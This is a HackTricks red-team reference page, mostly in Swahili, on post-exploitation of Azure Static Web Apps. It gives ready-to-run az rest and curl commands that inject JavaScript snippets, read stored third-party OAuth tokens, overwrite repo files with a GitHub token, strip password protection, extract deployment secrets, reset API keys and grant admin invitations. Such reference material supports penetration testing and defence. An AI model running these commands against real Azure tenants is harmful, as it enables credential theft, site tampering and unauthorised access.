HackTricks CloudAz - Static Web Apps Post Exploitation
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Azure Static Web Apps
Kwa habari zaidi kuhusu huduma hii angalia:
Microsoft.Web/staticSites/snippets/write
Inawezekana kufanya ukurasa wa wavuti wa static upakue msimbo wa HTML wowote kwa kuunda snippet. Hii inaweza kumruhusu attacker kuingiza JS code ndani ya web app na kuiba taarifa nyeti kama credentials au mnemonic keys (katika web3 wallets).
Amri ifuatayo itaunda snippet ambayo itapakiwa kila wakati na web app::
az rest \
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
Kusoma cheti za mtu wa tatu zilizowekwa
Kama ilivyoelezwa katika sehemu ya App Service:
Kwa kuendesha amri ifuatayo inawezekana kusoma cheti za mtu wa tatu zilizosanifiwa kwenye akaunti ya sasa. Kumbuka kwamba, kwa mfano, ikiwa baadhi ya cheti za Github zimesanifiwa chini ya mtumiaji mwingine, huwezi kufikia token kutoka kwa mtumiaji mwingine.
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
Amri hii inarudisha tokens za Github, Bitbucket, Dropbox na OneDrive.
Hapa kuna baadhi ya mifano ya amri za kukagua tokens:
# GitHub – List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
Kuandika juu ya faili - Kuandika juu ya routes, HTML, JS…
Inawezekana kuandika juu ya file ndani ya Github repo inayohifadhi app kupitia Azure ikiwa inayo Github token, kwa kutuma request kama ifuatayo ambayo itaonyesha path ya file ya kuandika juu yake, content ya file na commit message.
Hii inaweza kutumiwa vibaya na wadukuzi kubadilisha kwa msingi content ya web app ili kutoa malicious content (kupora credentials, mnemonic keys…) au tu re-route certain paths kwa servers zao kwa kuandika juu ya staticwebapp.config.json file.
Warning
Kumbuka kwamba ikiwa mdukuzi atafanikiwa kudhoofisha Github repo kwa njia yoyote, wanaweza pia kuandika juu ya file moja kwa moja kutoka Github.
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
-H "Content-Type: application/json" \
-d '{
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
}'
### Microsoft.Web/staticSites/config/write
Kwa ruhusa hii, inawezekana kubadilisha nenosiri linalolinda static web app au hata kuondoa ulinzi kwa mazingira yote kwa kutuma ombi kama ifuatayo:
# Change password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
}'
# Remove the need of a password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
}'
Microsoft.Web/staticSites/listSecrets/action
Ruhusa hii inaruhusu kupata API key deployment token ya static app.
Kutumia az rest:
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
Kutumia AzCLI:
az staticwebapp secrets list --name <appname> --resource-group <RG>
Kisha, ili kusasisha app using the token unaweza kuendesha amri ifuatayo. Kumbuka kuwa amri hii ilitolewa kwa kuangalia how to Github Action https://github.com/Azure/static-web-apps-deploy works, kwa kuwa ndio ile Azure iliweka kwa chaguo-msingi kutumia. Hivyo image na parameters zinaweza kubadilika siku zijazo.
Tip
Ili ku-deploy app unaweza kutumia zana ya
swakutoka https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token au fuata hatua zifuatazo:
- Download the repo https://github.com/staticwebdev/react-basic (au repo nyingine yoyote unayotaka ku-deploy) na run
cd react-basic. - Change the code you want to deploy
- Deploy it running (Remember to change the
<api-token>):
docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
Warning
Hata kama una token hutaweza ku-deploy app ikiwa Sera ya Uidhinishaji ya Utekelezaji imewekwa kuwa Github. Ili kutumia token utahitaji ruhusa
Microsoft.Web/staticSites/writekubadilisha njia ya deployment ili kutumia token ya APi.
Microsoft.Web/staticSites/write
Kwa ruhusa hii inawezekana kubadilisha chanzo cha static web app kwenda repository tofauti ya Github, hata hivyo haitoweza kusetiwa moja kwa moja kwa kuwa lazima ifanywe kupitia Github Action.
Hata hivyo, ikiwa Sera ya Uidhinishaji ya Utekelezaji imewekwa kuwa Github, inawezekana kusasisha app kutoka kwenye repository mpya ya chanzo!.
Ikiwa Sera ya Uidhinishaji ya Utekelezaji haijawekwa kuwa Github, unaweza kuibadilisha kwa ruhusa ile ile Microsoft.Web/staticSites/write.
# Change the source to a different Github repository
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
# Update the deployment method to Github
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>?api-version=2022-09-01" \
--headers 'Content-Type=application/json' \
--body '{
"properties": {
"allowConfigFileUpdates": true,
"stagingEnvironmentPolicy": "Enabled",
"buildProperties": {
"appLocation": "/",
"apiLocation": "",
"appArtifactLocation": "build"
},
"deploymentAuthPolicy": "GitHub",
"repositoryToken": "<github_token>" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
}
}'
Mfano wa Github Action ili ku-deploy app:
name: Azure Static Web Apps CI/CD
on:
push:
branches:
- main
pull_request:
types: [opened, synchronize, reopened, closed]
branches:
- main
jobs:
build_and_deploy_job:
if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
runs-on: ubuntu-latest
name: Build and Deploy Job
permissions:
id-token: write
contents: read
steps:
- uses: actions/checkout@v3
with:
submodules: true
lfs: false
- name: Install OIDC Client from Core Package
run: npm install @actions/core@1.6.0 @actions/http-client
- name: Get Id Token
uses: actions/github-script@v6
id: idtoken
with:
script: |
const coredemo = require('@actions/core')
return await coredemo.getIDToken()
result-encoding: string
- name: Build And Deploy
id: builddeploy
uses: Azure/static-web-apps-deploy@v1
with:
azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
action: "upload"
###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
app_location: "/" # App source code path
api_location: "" # Api source code path - optional
output_location: "build" # Built app content directory - optional
github_id_token: ${{ steps.idtoken.outputs.result }}
###### End of Repository/Build Configurations ######
close_pull_request_job:
if: github.event_name == 'pull_request' && github.event.action == 'closed'
runs-on: ubuntu-latest
name: Close Pull Request Job
steps:
- name: Close Pull Request
id: closepullrequest
uses: Azure/static-web-apps-deploy@v1
with:
action: "close"
Microsoft.Web/staticSites/resetapikey/action
Kwa ruhusa hii inawezekana reset the API key of the static web app, jambo linaloweza kusababisha DoSing kwa workflows zinazoweka app kiotomatiki.
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
Microsoft.Web/staticSites/createUserInvitation/action
Ruhusa hii inaruhusu kuunda mualiko kwa mtumiaji ili aweze kufikia njia zilizo na ulinzi ndani ya static web app kwa role maalum iliyotolewa.
Login iko katika path kama /.auth/login/github kwa github au /.auth/login/aad kwa Entra ID, na mtumiaji anaweza kualikwa kwa amri ifuatayo:
az staticwebapp users invite \
--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \
--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \
--invitation-expiration-in-hours 168 # 7 days is max \
--name my-first-static-web-app # Name of the app\
--roles "contributor,administrator" # Comma sepparated list of roles\
--user-details username # Github username in this case\
--resource-group Resource_Group_1 # Resource group of the app
Pull Requests
Kwa kawaida Pull Requests kutoka tawi ndani ya repo hiyo zitatengenezwa na kujengwa moja kwa moja katika mazingira ya staging. Hii inaweza kutumiwa vibaya na mshambuliaji aliye na ufikiaji wa kuandika kwenye repo lakini ambaye hawezi kuingia juu ya ulinzi wa tawi la uzalishaji (kwa kawaida main) ili kudeploy toleo la hatari la app kwenye URL ya staging.
The staging URL has this format: https://<app-subdomain>-<PR-num>.<region>.<res-of-app-domain> like: https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net
Tip
Kumbuka kwamba kwa chaguo-msingi PR za nje hazitaiendesha workflows isipokuwa kama zimeunganisha angalau PR 1 kwenye repository. Mshambuliaji anaweza kutuma PR halali kwenye repo na kisha kutuma PR yenye madhara kwenye repo ili kudeploy app hatari katika mazingira ya staging. HATAKO, kuna kinga isiyotarajiwa: default Github Action ya ku-deploy kwenye static web app inahitaji ufikiaji wa secret inayohifadhi deployment token (kama
secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F) hata ikiwa deployment inafanywa kwa IDToken. Hii ina maana kwamba kwa kuwa PR ya nje haitakuwa na ufikiaji wa secret hii na PR ya nje haiwezi kubadilisha Workflow ili kuweka hapa token yoyote bila PR kukubaliwa, shambulio hili halitafanya kazi kweli.
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.